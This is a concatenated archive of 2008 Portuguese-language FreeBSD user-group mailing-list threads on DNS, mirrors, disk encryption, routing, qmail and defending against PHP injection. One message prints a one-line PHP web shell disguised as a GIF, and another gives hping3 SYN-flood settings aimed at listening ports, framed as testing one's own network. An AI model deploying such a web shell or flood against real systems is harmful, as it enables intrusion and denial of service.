que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela Juniper. São as mesmas utilizadas no Juniper série 5000,
[FUG-BR] RES: Configuracao de DNS Reverso no TinyDNS
Aqui faço assim: ##REVERSO EMBRATEL 0-63 .0-63.3.2.200.in-addr.arpa:200.2.3.X:a .0-63.3.2.200.in-addr.arpa:200.2.3.X:b ^1.0-63.3.2.200.in-addr.arpa:server1.dominio.com.br ^2.0-63.3.2.200.in-addr.arpa:server2.dominio.com.br Neste caso, é o reverso pra zona 200.2.3.0/26 (0 à 63). -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Fabiano (BiGu) Enviada em: sexta-feira, 22 de fevereiro de 2008 13:04 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: [FUG-BR] Configuracao de DNS Reverso no TinyDNS Pessoal, andei dando uma lida na configuracao do tinydns, na verdade, ele esta funcionando legal aqui, o problema nao estou conseguindo configurar o dns reverso para meu bloco, tenho um servidor de email nesses ips, entao preciso do dns reverso..alguem pode me dar um help? dei uma lida na documentacao, mas fiquei confuso! Meu bloco de Ip é 201.65.221.168/29, na verdade existia um arquivo aqui com final .in-addr.arpa, mas deu um problema aqui e perdi esse arquivo, e nao sei qual o conteudo dele!!! se alguem puder me ajudar!! Abaixo o meu config do tinydns: # ## GRUPO HERINGER # # Recebe autoridade no dominio grupoheringer.com.br .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in- addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in- addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br ^170.221.65.201.in-addr.arpa:gateway.grupoheringer.com.br ^171.221.65.201.in-addr.arpa:servidor.grupoheringer.com.br ^172.221.65.201.in-addr.arpa:asterisk.grupoheringer.com.br # A, CNAME, Alias, PTR, MX =gateway.grupoheringer.com.br:201.65.221.170 =asterisk.grupoheringer.com.br:201.65.221.172 =a.ns.grupoheringer.com.br:201.65.221.171 =b.ns.grupoheringer.com.br:201.65.221.172 +grupoheringer.com.br:201.65.221.170 +www.grupoheringer.com.br:201.65.221.171 +mail.grupoheringer.com.br:201.65.221.172 +ftp.grupoheringer.com.br:201.65.221.171 +webmail.grupoheringer.com.br:201.65.221.172 +painel.grupoheringer.com.br:201.65.221.172 @grupoheringer.com.br::asterisk.grupoheringer.com.br:10 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd smime.p7s Description: S/MIME cryptographic signature - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] para quem cuida dos mirrors brasileiros do FreeBSD...
Citando Ricardo Bueno da Silva: Olá Ari, com relação a espaço em disco: Mirror FTP: ~90 GB Mirror CVSUP: ~4 GB Com relação ao consumo do link, no momento não tenho a estatistica somente dos mirrors do FreeBSD, dado que o servidor de FTP que hospeda esse mirror (ftp.unicamp.br) também hospeda várias outras coisas. Assim que eu tiver a estatistica somente de ftp3.br.freebsd.org e cvsup2.br.freebsd.org eu informo. []s Ricardo Bueno On Thu, Feb 21, 2008 at 04:31:21PM -0300, Ari Arantes wrote: Ricardo, Você monitora o consumo do link que esse mirror custa para você? E o espaço em disco? []s, Ari Em 20/02/08, Ricardo Bueno da Silva[EMAIL PROTECTED] escreveu: Marcelo Duarte wrote: Carlos Anderson Jardim escreveu: Que coisa, É por isso que eu uso o cvsup03.US.FreeBSD.org O que podemos fazer para ajudar??? Att. Carlos Anderson Jardim Bom dia a todos, Carlos, estamos falando de mirrors FTP (BR) e não CVSUP (BR). Manter um mirror FTP demanda espaço para armazenamento, o que faz muitos desistirem com o passar do tempo. Sou mantenedor do cvsup3.br.freebsd.org e posso garantir que o cvsup1, 2 e 3 do Brasil funcionam maravilhosamente bem. Algum tempo atrás pela falta de comprometimento dos mirros FTP (BR) eu disse nessa lista que iria montar um, porém ainda tenho falta de espaço nos meus servidores. Prestigie o BR .. usem o cvsup(x).br.freebsd.org Atenciosamente, Marcelo Duarte (FORFE) São Carlos Olá pessoal, mantenho o cvsup2.br.freebsd.org e o ftp3.br.freebsd.org e confesso que levei um susto ao verificar a situação dos demais mirros brasileiros. Como o Marcelo disse, a demanda de espaço para manter um mirror do FTP acarreta em algumas desistências. Há um tempo, tivemos problemas de hardware (disco) em nosso servidor e ficamos algumas semanas com o mirror fora do ar. Nosso link anda meio carregado, mas fora do horário de expediente tá uma beleza. :-) Fica aqui o convite para que utilizem esses mirrors. No momento, estou pensando em propor um mirror do portsnap por aqui, mas ainda não tenho ideia de espaço necessário para mantê-lo nem de banda que ele exigirá. Mas isso deve ficar para depois de conseguirmos aumentar nosso link por aqui. []s Ricardo Bueno -- Ricardo Bueno da Silva senhores, boa tarde _o/ gostaria de acrescentar só algumas palavras ao papo; thread antiga que o marcelo citou; * http://fug.com.br/historico/html/freebsd/2007-12/msg00722.html * cheguei a responder este último email dele, mas... não aparece ai (nem no histórico). buscando aqui nos meus 'itens enviados', recuperei o conteúdo; sem palavras (; espero nao ficar so de agradecimentos. conseguindo algo que me auxilie e suporte a publicacao de outro mirror .br nao exitarei em disponibilizar. abraco * bueno... 90GB?! Oo * sanchez, o link que vc mandou é confiável. já tinha visto (; Mirroring FreeBSD; * http://freebsd.org/doc/en_US.ISO8859-1/articles/hubs/index.html []'s - Webmail SecrelNet - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] criptografia de partição montada no boot
Opa digo eu , valeu mesmo , vou testar na maquina de testes na segunda e retorno , esse -b realmente passou , eu olhando para -P -p , mas o problema eu já sabia que era entre teclado e cadeira , hehehehe obrigado Em Qui, 2008-02-21 às 15:00 -0300, Daniel Bristot de Oliveira escreveu: Opa, Faltou o parametro -b no geli init ... man geli -b Ask for the passphrase on boot, before the root par- tition is mounted. This makes it possible to use an encrypted root partition. One will still need bootable unencrypted storage with a /boot/ direc- tory, which can be a CD-ROM disc or USB pen-drive, that can be removed after boot. --- Descupe pelo mal entendido na primeira mensagem ;) Att Em 20/02/08, Marcelo Soares da Costa[EMAIL PROTECTED] escreveu: Eu desejo apenas montar no boot uma segunda partição primaria no mesmo sata onde estara a aplicação /dev/ad4s2.eli como disse funciona tudo direitinho mas não esta montando no boot e ao montar na linha de comando exige as passfrase(senha) Segundo o handbook bastaria isso no rc.conf onde o -p é por chave e não por senha, mas não ta rolando geli_devices=ad4s2 geli_ad4s2_flags=-p -k /root/ad4s2.key A instalação do freebsd esta em /dev/ad4s1 Pensei em criar um script mas pedindo a senha complica pois teria que armarzenar a senha em um arquivo Se vc ou alguem da lista esta montando uma partição qualquer criptografada que seja montada no boot dever ter tropeçado nisso , a primeira suspeita seria o comando : geli init -s 4096 -K /root/ad4s2.key /dev/ad4s2 Sera que faltou algum parametro ??? Obrigado []'s Em Qua, 2008-02-20 às 07:51 -0300, Daniel Bristot de Oliveira escreveu: Marcelo, Se eu entendi bem, você quer criptogravar o / e bootar nele? Se for isto, não é possível com o Geom, não da de criptografar tudo e bootar por ele(como vou bootar um kernel que não consigo acessar por estar criptografado?). Você precisa ao menos dos arquivos de boot ao alcanse de qualquer um para que o sistema possa iniciar, carregar os modulos do geom e ai sim trabalhar com os discos criptografados. Att Em 19/02/08, Marcelo Soares da Costa[EMAIL PROTECTED] escreveu: Caros amigos : Estou com um problema entre cadeira e teclado e estou andando em circulos , fiz testes com geli e gbde para criptografar uma partição , ambos funcionam muito bem mas não estou conseguindo montar automaticamente no boot , creio que a pecinha com defeito seja esta entre teclado e cadeira mesmo , gostei mais do geli, então gostaria de saber se alguma alma caridosa pode apontar onde eu estou errado. O que eu quero é que a partição seja montada sem intervenção do admin , pois a idéia é em caso de furto do equipamento não ter acesso a partição , todas as providencias como boot single com senha etc serão tomadas, sendo assim não havendo necessidade de digitar a senha ao montar a partição ou coloca-la em um arquivo texto. segue o passo a passo : dd if=/dev/random of=/root/ad4s2.key bs=64 count=1 geli init -s 4096 -K /root/ad4s2.key /dev/ad4s2 cat /root/ad4s2.key | geli init -K - /dev/ad4s2 geli attach -k /root/ad4s2.key /dev/ad4s2 newfs /dev/ad4s2.eli mount /dev/ad4s2.eli /private/ no rc.conf : geli_devices=ad4s2 geli_ad4s2_flags=-p -k /root/ad4s2.key sempre que tento montar mesmo com : geli attach -p -k /root/ad4s2.key /dev/ad4s2 esta pedindo a senha tks []'s - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Daniel Bristot de Oliveira - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] SYNFlood
Eu quero testar quanto tempo minha rede suporta ataque SYNFlood, sugestões ? - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] meio OT - quagga routing
Caros, boa tarde! Configurei meu quagga para rodar RIP v2, e dessa forma se FALAR com outros devices que compõe minha rede. Se eu telnetar o conector de loop (127.0.0.1), na porta 2602 e der um show ip rip, todas as entradas são mostradas, tudo certinho. Só que as rotas não são transferidas para a tabela de roteamento! Quando eu dou um nestat -ar retorna apenas a rota default. O que poderia estar acontecendo? Grande abraço a todos! E. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] meio OT - quagga routing
O zebra está rodando? Felipe. Edv escreveu: Caros, boa tarde! Configurei meu quagga para rodar RIP v2, e dessa forma se FALAR com outros devices que compõe minha rede. Se eu telnetar o conector de loop (127.0.0.1), na porta 2602 e der um show ip rip, todas as entradas são mostradas, tudo certinho. Só que as rotas não são transferidas para a tabela de roteamento! Quando eu dou um nestat -ar retorna apenas a rota default. O que poderia estar acontecendo? Grande abraço a todos! E. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] meio OT - quagga routing
Zebra e ripd rodando, tranquilo... - Original Message - From: Felipe Neuwald [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Friday, February 22, 2008 2:18 PM Subject: Re: [FUG-BR] meio OT - quagga routing O zebra está rodando? Felipe. Edv escreveu: Caros, boa tarde! Configurei meu quagga para rodar RIP v2, e dessa forma se FALAR com outros devices que compõe minha rede. Se eu telnetar o conector de loop (127.0.0.1), na porta 2602 e der um show ip rip, todas as entradas são mostradas, tudo certinho. Só que as rotas não são transferidas para a tabela de roteamento! Quando eu dou um nestat -ar retorna apenas a rota default. O que poderia estar acontecendo? Grande abraço a todos! E. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] RES: OT-Ataque PHP injection
Aproveitando a discussão, uma solução comercial bacana que detecta estes e outros tipos de ameaças à segurança: http://www.cisco.com/en/US/products/hw/vpndevc/ps4077/index.html Há também um módulo de rede(slot) para a série 26, 36 e 37, com capacidade menor, é claro, mas com mesma versão do IDS sensor... -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Marcelo M. Fleury Enviada em: sexta-feira, 22 de fevereiro de 2008 12:52 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: Re: [FUG-BR] OT-Ataque PHP injection Bom, Patrick, você está certo :), obrigado pelo post explicativo, tanto tempo sem mexer no snort ou em qualquer ids/ips, me fez confundir as bolas xD. []s Em 22/02/08, Patrick Tracanelli [EMAIL PROTECTED] escreveu: Patrick Tracanelli escreveu: Marcelo M. Fleury escreveu: Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios internos façam ataque de injection em qualquer q seja o destino/alvo. Ou melhor, *não* façam. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2 fluxos, o que sai e o que entra na/da rede. Ainda não entendi a relutancia hehe. na realidade não conheço solução voltada para isso... existe o mod_security A solução é o IPS/IDs hehe ;) O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela quer. O mod_security é o mais indicado pra proteger exclusivamente o Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto sequer, é capaz de identificar padrões iniciados da maquina com mod_security para outros destinos. Apenas quando o destino final é o Apache (serviço httpd). do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não resolva! Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser pro-ativa. E pelo que entendi na situação da Cristina ela não terá logs do Apache ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos). Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da
Re: [FUG-BR] meio OT - quagga routing
Se você adiciona uma rota manualmente através do zebra, ela vai para a tabela de roteamento do sistema? Abs, Felipe. Edv escreveu: Zebra e ripd rodando, tranquilo... - Original Message - From: Felipe Neuwald [1][EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) [2]freebsd@fug.com.br Sent: Friday, February 22, 2008 2:18 PM Subject: Re: [FUG-BR] meio OT - quagga routing O zebra está rodando? Felipe. Edv escreveu: Caros, boa tarde! Configurei meu quagga para rodar RIP v2, e dessa forma se FALAR com outros devices que compõe minha rede. Se eu telnetar o conector de loop (127.0.0.1), na porta 2602 e der um show ip rip, todas as entradas são mostradas, tudo certinho. Só que as rotas não são transferidas para a tabela de roteamento! Quando eu dou um nestat -ar retorna apenas a rota default. O que poderia estar acontecendo? Grande abraço a todos! E. - Histórico: [3]http://www.fug.com.br/historico/html/freebsd/ Sair da lista: [4]https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: [5]http://www.fug.com.br/historico/html/freebsd/ Sair da lista: [6]https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: [7]http://www.fug.com.br/historico/html/freebsd/ Sair da lista: [8]https://www.fug.com.br/mailman/listinfo/freebsd References 1. mailto:[EMAIL PROTECTED] 2. mailto:freebsd@fug.com.br 3. http://www.fug.com.br/historico/html/freebsd/ 4. https://www.fug.com.br/mailman/listinfo/freebsd 5. http://www.fug.com.br/historico/html/freebsd/ 6. https://www.fug.com.br/mailman/listinfo/freebsd 7. http://www.fug.com.br/historico/html/freebsd/ 8. https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [resolvido] meio OT - quagga routing
Ao retirar as rodas manualmente, removi a que conecta a rede ao dispositivo, e mantive apenas a rota default. Everything is going fine now, thanks E. - Original Message - From: Edv [EMAIL PROTECTED] To: freebsd@fug.com.br Sent: Friday, February 22, 2008 2:16 PM Subject: [FUG-BR] meio OT - quagga routing Caros, boa tarde! Configurei meu quagga para rodar RIP v2, e dessa forma se FALAR com outros devices que compõe minha rede. Se eu telnetar o conector de loop (127.0.0.1), na porta 2602 e der um show ip rip, todas as entradas são mostradas, tudo certinho. Só que as rotas não são transferidas para a tabela de roteamento! Quando eu dou um nestat -ar retorna apenas a rota default. O que poderia estar acontecendo? Grande abraço a todos! E. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] meio OT - quagga routing
Da quagga-users: [1]http://lists.quagga.net/pipermail/quagga-users/2008-February/009392. html [2]http://lists.quagga.net/pipermail/quagga-users/2008-February/009393. html [3]http://lists.quagga.net/pipermail/quagga-users/2008-February/009394. html É FreeBSD 6.2? Abs, Felipe. Edv escreveu: Zebra e ripd rodando, tranquilo... - Original Message - From: Felipe Neuwald [4][EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) [5]freebsd@fug.com.br Sent: Friday, February 22, 2008 2:18 PM Subject: Re: [FUG-BR] meio OT - quagga routing O zebra está rodando? Felipe. Edv escreveu: Caros, boa tarde! Configurei meu quagga para rodar RIP v2, e dessa forma se FALAR com outros devices que compõe minha rede. Se eu telnetar o conector de loop (127.0.0.1), na porta 2602 e der um show ip rip, todas as entradas são mostradas, tudo certinho. Só que as rotas não são transferidas para a tabela de roteamento! Quando eu dou um nestat -ar retorna apenas a rota default. O que poderia estar acontecendo? Grande abraço a todos! E. - Histórico: [6]http://www.fug.com.br/historico/html/freebsd/ Sair da lista: [7]https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: [8]http://www.fug.com.br/historico/html/freebsd/ Sair da lista: [9]https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: [10]http://www.fug.com.br/historico/html/freebsd/ Sair da lista: [11]https://www.fug.com.br/mailman/listinfo/freebsd References 1. http://lists.quagga.net/pipermail/quagga-users/2008-February/009392.html 2. http://lists.quagga.net/pipermail/quagga-users/2008-February/009393.html 3. http://lists.quagga.net/pipermail/quagga-users/2008-February/009394.html 4. mailto:[EMAIL PROTECTED] 5. mailto:freebsd@fug.com.br 6. http://www.fug.com.br/historico/html/freebsd/ 7. https://www.fug.com.br/mailman/listinfo/freebsd 8. http://www.fug.com.br/historico/html/freebsd/ 9. https://www.fug.com.br/mailman/listinfo/freebsd 10. http://www.fug.com.br/historico/html/freebsd/ 11. https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] SYNFlood
Cabral escreveu: Eu quero testar quanto tempo minha rede suporta ataque SYNFlood, sugestões ? Instala o hping-devel do ports (hping3) e use com -S --faster. É o tipo de ferrei Cisco. O CPU load de um cisco vai no minimo dobrar. Se for um router mais modesto vai pra 100% e ai xau serviço, DoS. Pra testar a rede inteira use as opcoes de random source e random dst. -- Patrick Tracanelli FreeBSD Brasil LTDA. Tel.: (31) 3516-0800 [EMAIL PROTECTED] http://www.freebsdbrasil.com.br Long live Hanin Elias, Kim Deal! - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] meio OT - quagga routing
Edv escreveu: Caros, boa tarde! Configurei meu quagga para rodar RIP v2, e dessa forma se FALAR com outros devices que compõe minha rede. Se eu telnetar o conector de loop (127.0.0.1), na porta 2602 e der um show ip rip, todas as entradas são mostradas, tudo certinho. Só que as rotas não são transferidas para a tabela de roteamento! Quando eu dou um nestat -ar retorna apenas a rota default. O que poderia estar acontecendo? Rotas estaticas carregadas antes do quagga, com certeza. Remova as rotas estaticas, todas, inclusive 0.0.0.0, e use apenas o quagga pra gerencia-las, inclusive a padrão. -- Patrick Tracanelli FreeBSD Brasil LTDA. Tel.: (31) 3516-0800 [EMAIL PROTECTED] http://www.freebsdbrasil.com.br Long live Hanin Elias, Kim Deal! - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] SYNFlood
Patrick Tracanelli escreveu: Cabral escreveu: Eu quero testar quanto tempo minha rede suporta ataque SYNFlood, sugestões ? Instala o hping-devel do ports (hping3) e use com -S --faster. É o tipo de ferrei Cisco. O CPU load de um cisco vai no minimo dobrar. Se for um router mais modesto vai pra 100% e ai xau serviço, DoS. So lembrando, destine o ataque a portas que os devices estao ouvindo, pra fazer mais estrago e ter resultados mais interessantes nos seus testes. Por exemplo, no cisco mande pra porta 23 ou 22; nos windão vá de netbios, nos unix qq coisa, apache, ja ta valendo. Pra testar a rede inteira use as opcoes de random source e random dst. -- Patrick Tracanelli FreeBSD Brasil LTDA. Tel.: (31) 3516-0800 [EMAIL PROTECTED] http://www.freebsdbrasil.com.br Long live Hanin Elias, Kim Deal! - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Dúvida com qmail / user is over quota / bounce
Marcos Jesus Faria wrote: 2008/2/20 Anderson Michel [EMAIL PROTECTED]: Olá Pessoal, Estou usando atualmente o qmail-spamcontrol, com o recurso do /var/qmail/users/recipients.cdb habilitado, e tem me aliviado demais os bounces (putz, sofri muito antes de ter isso, pois ficavam 2000, 3000, as vezes 5000 mensagens na fila só por causa disso), mas enfim, esse problema está resolvido! A dúvida agora é com as contas existentes, mas que não tem espaço para armazenamento, tem como fazer o qmail-smtpd checar a quota antes de colocá-lo na fila, e consequentemente não gerar o bounce para esse tipo de e-mail? Para checar a quota eu uso o maildrop com a linha Obrigado pela ajuda Marcos! Só que não entendi como se faz para checar a quota com o maildrop. Poderia me esclarecer? Isso também evitará o double-bounce, pois alguns dos e-mails que deveriam ser entregues ao usuário com a caixa cheia são SPAM's! Referente a double-bounce eu uso a variável isso : # cd /var/qmail/control echo @ doublebounceto E no arquivo .qmail-default uso: | /usr/local/vpopmail/bin/vdelivermail '' delete Para não devolver nenhum tipo de mensagem. Espero ter ajudado. Valeu, eu não conhecia esse esquema acima, aqui sem problemas. Grato. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] RES: Configuracao de DNS Reverso no TinyDNS
pois eh, o meu ta assim: .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in-addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br sendo que o bloco é 201.65.221.168/29 ja chequei num site que testa reverso e nada...existe algum tempo pra ele ser publicado ou isso eh instantaneo? Abracos Renato Frederick escreveu: Aqui faço assim: ##REVERSO EMBRATEL 0-63 .0-63.3.2.200.in-addr.arpa:200.2.3.X:a .0-63.3.2.200.in-addr.arpa:200.2.3.X:b ^1.0-63.3.2.200.in-addr.arpa:server1.dominio.com.br ^2.0-63.3.2.200.in-addr.arpa:server2.dominio.com.br Neste caso, é o reverso pra zona 200.2.3.0/26 (0 à 63). -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Fabiano (BiGu) Enviada em: sexta-feira, 22 de fevereiro de 2008 13:04 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: [FUG-BR] Configuracao de DNS Reverso no TinyDNS Pessoal, andei dando uma lida na configuracao do tinydns, na verdade, ele esta funcionando legal aqui, o problema nao estou conseguindo configurar o dns reverso para meu bloco, tenho um servidor de email nesses ips, entao preciso do dns reverso..alguem pode me dar um help? dei uma lida na documentacao, mas fiquei confuso! Meu bloco de Ip é 201.65.221.168/29, na verdade existia um arquivo aqui com final .in-addr.arpa, mas deu um problema aqui e perdi esse arquivo, e nao sei qual o conteudo dele!!! se alguem puder me ajudar!! Abaixo o meu config do tinydns: # ## GRUPO HERINGER # # Recebe autoridade no dominio grupoheringer.com.br .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in- addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in- addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br ^170.221.65.201.in-addr.arpa:gateway.grupoheringer.com.br ^171.221.65.201.in-addr.arpa:servidor.grupoheringer.com.br ^172.221.65.201.in-addr.arpa:asterisk.grupoheringer.com.br # A, CNAME, Alias, PTR, MX =gateway.grupoheringer.com.br:201.65.221.170 =asterisk.grupoheringer.com.br:201.65.221.172 =a.ns.grupoheringer.com.br:201.65.221.171 =b.ns.grupoheringer.com.br:201.65.221.172 +grupoheringer.com.br:201.65.221.170 +www.grupoheringer.com.br:201.65.221.171 +mail.grupoheringer.com.br:201.65.221.172 +ftp.grupoheringer.com.br:201.65.221.171 +webmail.grupoheringer.com.br:201.65.221.172 +painel.grupoheringer.com.br:201.65.221.172 @grupoheringer.com.br::asterisk.grupoheringer.com.br:10 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] RES: RES: Configuracao de DNS Reverso no TinyDNS
